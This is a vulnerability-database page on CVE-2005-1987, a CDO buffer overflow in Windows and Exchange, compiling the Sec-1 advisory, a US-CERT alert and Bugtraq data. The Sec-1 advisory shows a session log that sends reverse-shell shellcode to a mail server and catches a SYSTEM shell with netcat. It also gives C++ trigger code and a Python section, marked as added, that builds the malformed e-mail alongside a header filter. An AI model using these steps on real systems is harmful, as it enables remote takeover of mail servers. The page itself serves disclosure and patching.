CVE-2005-1987
CVSS7.5
Published: 2005-10-13 06:02:00
Revised: 2016-10-17 23:23:44
NMCOPS    

[Original] Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string.


[CNNVD] Microsoft Collaboration Data Objects Remote Overflow Vulnerability (CNNVD-200510-082)

        Microsoft Windows is the widely used operating system published by Microsoft. Collaboration Data Objects (CDO) is a COM component that makes it easier for other programs to create or modify Internet mail messages.
        A remote overflow vulnerability exists in Microsoft CDO. An attacker can craft a special network message (normally delivered over SMTP). If CDOSYS or CDOEX on an affected system processes that message, arbitrary code may be executed.

- CVSS (Base Score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected platforms and products)

cpe:/o:microsoft:windows_2003_server:64-bit
cpe:/o:microsoft:windows_2003_server:itanium
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_xp::sp2:tablet_pc	Microsoft Windows XP SP2 Tablet PC
cpe:/a:microsoft:exchange_server:2000:sp3	Microsoft Exchange Server 2000 Service Pack 3
cpe:/o:microsoft:windows_xp::sp1:tablet_pc	Microsoft Windows XP SP1 Tablet PC
cpe:/o:microsoft:windows_2003_server:sp1
cpe:/o:microsoft:windows_2003_server:r2
cpe:/o:microsoft:windows_2000::sp4::fr
cpe:/o:microsoft:windows_2003_server:sp1::itanium

- OVAL (Technical details for detection)

oval:org.mitre.oval:def:848	Buffer Overflow in CDOSYS Message Processing (64-bit WinXP,SP1)
oval:org.mitre.oval:def:581	Buffer Overflow in CDOSYS Message Processing (Server 2003,SP1)
oval:org.mitre.oval:def:1515	Buffer Overflow in CDOSYS Message Processing (WinXP,SP2)
oval:org.mitre.oval:def:1420	Buffer Overflow in CDOSYS Message Processing (Win2K,SP4)
oval:org.mitre.oval:def:1406	Buffer Overflow in CDOSYS Message Processing (WinXP,SP1)
oval:org.mitre.oval:def:1201	Buffer Overflow in CDOEX Message Processing
oval:org.mitre.oval:def:1130	Buffer Overflow in CDOSYS Message Processing (Server 2003)
oval:gov.nist.fdcc.patch:def:221	MS05-048: Vulnerability in the Microsoft Collaboration Data Objects Could Allow Remote Code Execution (907245)
oval:gov.nist.USGCB.patch:def:221	MS05-048: Vulnerability in the Microsoft Collaboration Data Objects Could Allow Remote Code Execution (907245)
*OVAL describes in detail how to detect this vulnerability; the referenced OVAL definitions contain further technical detail on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1987
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1987
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-082
(Official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html
(UNKNOWN)  FULLDISC  20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability
http://marc.info/?l=bugtraq&m=112915118302012&w=2
(UNKNOWN)  BUGTRAQ  20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability
http://securitytracker.com/id?1015038
(UNKNOWN)  SECTRACK  1015038
http://securitytracker.com/id?1015039
(UNKNOWN)  SECTRACK  1015039
http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q907245
(UNKNOWN)  MSKB  Q907245
http://www.kb.cert.org/vuls/id/883460
(VENDOR_ADVISORY)  CERT-VN  VU#883460
http://www.microsoft.com/technet/security/bulletin/ms05-048.mspx
(VENDOR_ADVISORY)  MS  MS05-048
http://www.securityfocus.com/bid/15067
(UNKNOWN)  BID  15067
http://www.us-cert.gov/cas/techalerts/TA05-284A.html
(VENDOR_ADVISORY)  CERT  TA05-284A
http://xforce.iss.net/xforce/xfdb/22495
(UNKNOWN)  XF  win-cdo-bo(22495)

- Vulnerability information

Microsoft Collaboration Data Objects Remote Overflow Vulnerability
High severity  Buffer overflow
2005-10-13 00:00:00 2005-11-30 00:00:00
Remote  
        Microsoft Windows is the widely used operating system published by Microsoft. Collaboration Data Objects (CDO) is a COM component that makes it easier for other programs to create or modify Internet mail messages.
        A remote overflow vulnerability exists in Microsoft CDO. An attacker can craft a special network message (normally delivered over SMTP). If CDOSYS or CDOEX on an affected system processes that message, arbitrary code may be executed.

- Advisories and patches

        The vendor has released an update that fixes this security issue. The patch can be obtained from:
        http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx

- Vulnerability information (F40726)

sec-1-Collarboration.txt (PacketStormID:F40726)
2005-10-15 00:00:00
Gary O'Leary-Steele  sec-1.com
advisory,overflow
CVE-2005-1987
[Download]

Sec-1 has identified an exploitable buffer overflow within Collaboration Data Objects (Cdosys.dll and Cdoex.dll). The vulnerability exists when event sinks are used within Microsoft Exchange 2000 or Microsoft Mail services to parse e-mail content. Several Content Security packages were identified to be vulnerable/exploitable.

SEC-1 LTD.
                              www.sec-1.com

                             Security Advisory

Advisory Name: 	Collaboration Data Objects Buffer Overflow Vulnerability
  Application: 	Multiple Applications that implement CDO
     Platform: 	Windows 2000 (All versions)
			Windows XP (All versions inc sp2)
			Windows Server 2003 (All versions)
			Exchange 2000 Server post-Service Pack 3

     Severity: 	Critical. Remote Code Execution 
       Author: 	Gary O'leary-Steele 
Vendor Status: 	Patch Released
CVE Candidate: 	CAN-2005-1987
    Reference:	http://www.sec-1.com
    Disclosed:	12/October/2005


Vulnerability Details: 

Sec-1 has identified an exploitable Buffer Overflow within Collaboration
Data Objects (Cdosys.dll and Cdoex.dll). The vulnerability exists when 
event sinks are used within Microsoft Exchange 2000 or Microsoft Mail
services to parse e-mail content. Several Content Security packages
were identified to be vulnerable/exploitable.

The vulnerability can be exploited by crafting an e-mail with a large 
header name such as "Content-Type<LARGE STRING>:". 
A failure to correctly determine the length of the string results in a
stack overflow. Successful exploitation of the vulnerability could allow
the attacker to gain complete control of the vulnerable host. Under 
certain conditions the vulnerability can also be used to bypass content
security mechanisms such as virus and content security scanners. Proof
of concept code to recreate the problem is included at the bottom of this
advisory.


Exploit Availability:

Sec-1 do not release exploit code to the general public. 
Attendees of the Sec-1 Applied Hacking & Intrusion prevention course 
will receive a copy of this exploit as part of the Sec-1 Exploit
Arsenal. 
See: http://www.sec-1.com/applied_hacking_course.html


Exploit Example:

[root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53

Enter IP address of your attacking host: 10.0.0.200
Enter Port for shellcode to connect back on: 80

[*]----Connected OK!
[*]----Sending MAIL FROM: me@test.com
[*]----Sending RCPT TO: <me@test.com>
[*]----Sending Malformed E-mail body
[*]----Shellcode Length: 316
[*]----Shellcode type: Reverse shell
[*]----Done.

[!]	Note this may take a while. Inetinfo will crash and restart
	This will happen until a nops are reached. You may also want 
	to clear the queue to restore Inetinfo.exe by deleting malformed

	e-mail from c:\Inetpub\mailroot\Queue

[root@homer PoC]# nc -l -p 80 -v
listening on [any] 80 ...

10.0.0.53: inverse host lookup failed: Unknown host
connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.


C:\WINNT\system32>c:\whoami
NT AUTHORITY\SYSTEM

C:\WINNT\system32>


Vendor Response:

Microsoft have released the following information including a fix,
http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.

		CAN-2005-1987


Demonstration:

The following CDO code demonstrates the problem.

Step 1.

Create an E-mail named vuln.eml including a large "Content-Type:"
header.

Step 2.

// Compile with the -GX option (C++ exception handling; /EHsc on current
// compilers). Loads vuln.eml through CDO and reads the Content-Type field of
// every body part, which makes cdosys.dll parse the oversized header name.
#include <windows.h>
#include <comdef.h>
#include <stdio.h>

#import <msado15.dll> no_namespace rename("EOF", "adoEOF")
#import <cdosys.dll> rename_namespace("CDO")

int main()
{
    CoInitialize(0);
    try
    {
        // Create a CDO message and load the raw RFC 2822 text into its stream.
        CDO::IMessagePtr spMsg(__uuidof(CDO::Message));
        _StreamPtr spStream(spMsg->GetStream());
        spStream->Position = 0;
        spStream->Type = adTypeBinary;
        spStream->LoadFromFile("vuln.eml");
        spStream->Flush();   // commit the stream so CDO parses the message

        // Touch the Content-Type mail header of each body part; this is the
        // access that drives the header parser over the malformed name.
        for (long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++)
        {
            CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
            _variant_t v =
                spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
        }
    }
    catch (_com_error &e)
    {
        printf("COM error[0x%X, %s]\n", e.Error(), (LPCTSTR)e.Description());
    }
    catch (...)
    {
        printf("General exception\n");
    }

    CoUninitialize();
    return 0;
}
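The advisory's Step 1 only says to create vuln.eml with a large header name, and the BID "Exploit" section below gives the same one-line shape, "Content-Type<LARGE STRING>:". The following Python is an added example, not code from Sec-1, Microsoft, or this page: it builds such a message on the advisory's pattern and runs the header-name sanity check an SMTP gateway or content filter could apply before handing mail to a CDO-based event sink. The field-name cap of 64 octets is an assumed policy value; the 998-octet line limit and the field-name character set are taken from RFC 5322. Nothing here depends on the vulnerable DLLs, so it runs on any platform.

```python
# Added example (not from the Sec-1 advisory, Microsoft, or any project on this
# page): builds the message that Step 1 of the advisory describes, i.e. a header
# whose *name* is oversized ("Content-Type<LARGE STRING>:"), and runs the
# header-name sanity check an SMTP gateway or content filter could apply before
# handing mail to a CDO-based event sink. MAX_FIELD_NAME_LEN is an assumed
# policy value, not a number taken from the advisory or the patch.
import re

# RFC 5322 section 3.6.8: a field name is one or more printable US-ASCII
# characters (0x21-0x7E) other than ':' (0x3A).
FIELD_NAME_RE = re.compile(rb"^[\x21-\x39\x3B-\x7E]+$")

# Assumed policy cap on a header field name. RFC 5322 sets no limit on the
# name itself, but legitimate names are short; anything this long is hostile.
MAX_FIELD_NAME_LEN = 64

# RFC 5322 section 2.1.1: a line MUST NOT exceed 998 octets excluding CRLF.
MAX_LINE_LEN = 998

SAMPLE_HEADERS = (  # constructed sample, matching the advisory's SMTP session
    b"From: me@test.com\r\n"
    b"To: me@test.com\r\n"
    b"Subject: CDO header-name test\r\n"
)


def build_message(padding: int, filler: bytes = b"A") -> bytes:
    """Returns a minimal RFC 5322 message whose Content-Type header *name* is
    followed by `padding` filler bytes before the ':' (padding=0 is benign)."""
    header_name = b"Content-Type" + filler * padding
    return SAMPLE_HEADERS + header_name + b": text/plain\r\n\r\nbody\r\n"


def check_headers(raw: bytes) -> list:
    """Returns policy findings for the header block of `raw`; [] means clean."""
    findings = []
    head = raw.split(b"\r\n\r\n", 1)[0]          # header block ends at the first empty line
    for n, line in enumerate(head.split(b"\r\n"), 1):
        if len(line) > MAX_LINE_LEN:
            findings.append("line %d: %d octets exceeds RFC 5322 line limit %d"
                            % (n, len(line), MAX_LINE_LEN))
        if line[:1] in (b" ", b"\t"):
            continue  # folded continuation; the field name sits on the first line
        name, sep, _ = line.partition(b":")
        if not sep:
            findings.append("line %d: no ':' field separator" % n)
            continue
        if not FIELD_NAME_RE.match(name):
            findings.append("line %d: field name contains illegal bytes" % n)
        if len(name) > MAX_FIELD_NAME_LEN:
            findings.append("line %d: field name is %d octets, limit %d"
                            % (n, len(name), MAX_FIELD_NAME_LEN))
    return findings


if __name__ == "__main__":
    with open("vuln.eml", "wb") as f:           # input for the advisory's Step 2
        f.write(build_message(4096))
    for padding in (0, 100, 4096):
        print(padding, check_headers(build_message(padding)))
```

A 100-byte padding trips only the field-name cap, while the 4096-byte case also breaks the RFC line limit, so a filter enforcing just the RFC limit would still pass a name long enough to matter; the cap on the name itself is the check that catches the pattern this advisory describes.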


Copyright 2005 Sec-1 LTD. All rights reserved.
**************************************************************
NEW: Sec-1 Hacking Training - Learn to breach network security 
to further your knowledge and protect your network 
http://www.sec-1.com/applied_hacking_course.html
**************************************************************


    

- Vulnerability information (F40674)

CDObo.txt (PacketStormID:F40674)
2005-10-12 00:00:00
Gary O'Leary-Steele  sec-1.com
advisory,overflow
CVE-2005-1987
[Download]

Sec-1 has identified an exploitable Buffer Overflow within Collaboration Data Objects (Cdosys.dll and Cdoex.dll). The vulnerability exists when event sinks are used within Microsoft Exchange 2000 or Microsoft Mail services to parse e-mail content. Several Content Security packages were identified to be vulnerable/exploitable. The full text is the same Sec-1 advisory reproduced under F40726 above.
    

- Vulnerability information (F40619)

Technical Cyber Security Alert 2005-284A (PacketStormID:F40619)
2005-10-12 00:00:00
US-CERT  cert.org
advisory,remote,denial of service,arbitrary,vulnerability
windows
CVE-2005-2120,CVE-2005-1987,CVE-2005-2122,CVE-2005-2128,CVE-2005-2119,CVE-2005-1978,CVE-2005-2127,CVE-2005-0163
[Download]

Microsoft has released updates that address critical vulnerabilities in Windows, Internet Explorer, and Exchange Server. Exploitation of these vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service on an affected system.


            Technical Cyber Security Alert TA05-284A 
  Microsoft Windows, Internet Explorer, and Exchange Server
  Vulnerabilities

   Original release date: October 11, 2005
   Last revised: --
   Source: US-CERT

Systems Affected

     * Microsoft Windows
     * Microsoft Internet Explorer
     * Microsoft Exchange Server

   For more complete information, refer to the Microsoft Security
   Bulletin Summary for October 2005.

Overview

   Microsoft has released updates that address critical vulnerabilities
   in Windows, Internet Explorer, and Exchange Server. Exploitation of
   these vulnerabilities could allow a remote, unauthenticated attacker
   to execute arbitrary code or cause a denial of service on an affected
   system.

I. Description

   Microsoft Security Bulletins for October 2005 address vulnerabilities
   in Windows and Internet Explorer. Further information is available in
   the following US-CERT Vulnerability Notes:


   VU#214572 - Microsoft Plug and Play fails to properly validate user
   supplied data 

   Microsoft Plug and Play contains a flaw in the handling of message
   buffers that may result in local or remote arbitrary code execution or
   denial-of-service conditions.
   (CAN-2005-2120)


   VU#883460 - Microsoft Collaboration Data Objects buffer overflow 

   A buffer overflow in Microsoft Collaboration Data Objects may allow a
   remote, unauthenticated attacker to execute arbitrary code on a
   vulnerable system.
   (CAN-2005-1987)


   VU#922708 - Microsoft Windows Shell fails to handle shortcut files
   properly 

   Microsoft Windows Shell does not properly handle some shortcut files
   and may permit arbitrary code execution when a specially-crafted file
   is opened.
   (CAN-2005-2122)


   VU#995220 - Microsoft DirectShow buffer overflow 

   A buffer overflow in Microsoft DirectShow may allow a remote,
   unauthenticated attacker to execute arbitrary code on a vulnerable
   system.
   (CAN-2005-2128)


   VU#180868 - Microsoft Distributed Transaction Coordinator vulnerable
   to buffer overflow via specially crafted network message 

   Microsoft Distributed Transaction Coordinator (MSDTC) may be
   vulnerable to a flaw that allows remote, unauthenticated attackers to
   execute arbitrary code.
   (CAN-2005-2119)


   VU#950516 - Microsoft COM+ contains a memory management flaw 

   Microsoft COM+ contains a vulnerability due to a memory management
   flaw that may allow an attacker to take complete control of an
   affected system.
   (CAN-2005-1978)


   VU#959049 - Several COM objects cause memory corruption in Microsoft
   Internet Explorer 

   Microsoft Internet Explorer will initialize COM objects that were not
   intended to be used in the web browser. Several COM objects have been
   identified that may allow an attacker to execute arbitrary code or
   crash Internet Explorer.
   (CAN-2005-2127)


   VU#680526 - Microsoft Internet Explorer allows non-ActiveX COM objects
   to be instantiated

   Microsoft Internet Explorer will initialize COM objects that were not
   intended to be used in the web browser. This may allow an attacker to
   execute arbitrary code or crash Internet Explorer.
   (CAN-2005-0163)

II. Impact

   Exploitation of these vulnerabilities may allow a remote,
   unauthenticated attacker to execute arbitrary code with SYSTEM
   privileges or with the privileges of the user. If the user is logged
   on with administrative privileges, the attacker could take complete
   control of an affected system. An attacker may also be able to cause a
   denial of service.

III. Solution

Apply Updates

   Microsoft has provided the updates for these vulnerabilities in the
   Security Bulletins and on the Microsoft Update site.

Workarounds

   Please see the following US-CERT Vulnerability Notes for workarounds.

Appendix A. References

     * Microsoft Security Bulletin Summary for October 2005 -
       <http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx>

     * US-CERT Vulnerability Note VU#214572 -
       <http://www.kb.cert.org/vuls/id/214572>

     * US-CERT Vulnerability Note VU#883460 -
       <http://www.kb.cert.org/vuls/id/883460>

     * US-CERT Vulnerability Note VU#922708 -
       <http://www.kb.cert.org/vuls/id/922708>

     * US-CERT Vulnerability Note VU#995220 -
       <http://www.kb.cert.org/vuls/id/995220>

     * US-CERT Vulnerability Note VU#180868 -
       <http://www.kb.cert.org/vuls/id/180868>

     * US-CERT Vulnerability Note VU#950516 -
       <http://www.kb.cert.org/vuls/id/950516>

     * US-CERT Vulnerability Note VU#959049 -
       <http://www.kb.cert.org/vuls/id/959049>

     * US-CERT Vulnerability Note VU#680526 -
       <http://www.kb.cert.org/vuls/id/680526>

     * CAN-2005-2120 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120>

     * CAN-2005-1987 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987>

     * CAN-2005-2122 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122>

     * CAN-2005-2128 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128>

     * CAN-2005-2119 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119>

     * CAN-2005-1978 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978>

     * CAN-2005-2127 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127>

     * CAN-2005-0163 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163>

     * Microsoft Update - <https://update.microsoft.com/microsoftupdate>


  _________________________________________________________________

   The most recent version of this document can be found at:

   <http://www.us-cert.gov/cas/techalerts/TA05-284A.html> 
  _________________________________________________________________

   Feedback can be directed to US-CERT.  Please send email to:
   <cert@cert.org> with "TA05-284A Feedback VU#959049" in the subject.
  _________________________________________________________________

   Revision History

   Oct 11, 2005: Initial release
  _________________________________________________________________

   Produced 2005 by US-CERT, a government organization.
  
   Terms of use

   <http://www.us-cert.gov/legal.html>
  _________________________________________________________________

   For instructions on subscribing to or unsubscribing from this 
   mailing list, visit <http://www.us-cert.gov/cas/>.





    

- Vulnerability information

19905
Microsoft Collaboration Data Objects Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- Description

A remote overflow exists in Microsoft Collaboration Data Objects (CDO). The component fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted email message containing an overly long header line, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-10-12 Unknown
2005-10-13 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Author

- Vulnerability information

Microsoft Collaboration Data Objects Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error  Bugtraq ID: 15067
Remote: Yes  Local: No
Published: 2005-10-11 12:00:00  Updated: 2009-07-12 05:56:00
Gary O'leary-Steele of Sec-1 reported this issue to the vendor.

- Affected program versions

Nortel Networks Centrex IP Element Manager 8.0
Nortel Networks Centrex IP Element Manager 7.0
Nortel Networks Centrex IP Element Manager 2.5
Nortel Networks Centrex IP Client Manager 8.0
Nortel Networks Centrex IP Client Manager 7.0
Nortel Networks Centrex IP Client Manager 2.5
Nortel Networks Centrex IP Client Manager
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft IIS 6.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
Microsoft IIS 5.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
+ Microsoft Windows XP 64-bit Edition SP1
+ Microsoft Windows XP 64-bit Edition
+ Microsoft Windows XP 64-bit Edition
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Home
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
Microsoft IIS 5.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
+ Microsoft Windows 2000 Professional
+ Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
+ Microsoft Windows 2000 Server
+ Microsoft Windows 2000 Server
Microsoft Exchange Server 2000 SP3
Microsoft Exchange Server 2000 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 2000 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 2000
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server

- Discussion

Microsoft CDO is susceptible to a remote buffer overflow vulnerability. This issue is due to a failure of the library to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer.

This issue presents itself when an attacker sends a specifically crafted email message to an email server utilizing the affected library.

This issue allows remote attackers to execute arbitrary machine code in the context of the application utilizing the library.

- Exploit

The issue may be triggered by crafting an email with an overly long header name, for example:

Content-Type<LARGE STRING>:

The researcher who discovered this issue has developed working exploit code. This exploit code is not known to be circulating in the wild.

- Solution

Nortel Networks has released a technical support bulletin (2005006318) regarding this and other issues for their Centrex IP Client Manager (CICM). They report the vulnerabilities will be fixed in the upcoming 2.5, 7.0 and 8.0 maintenance releases. Please see the referenced bulletin for further information.

Fixes are available:

Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows XP Home SP2
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Exchange Server 2000 SP3
Microsoft Windows XP Professional SP2
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows XP Professional SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are kept on MITRE's websites.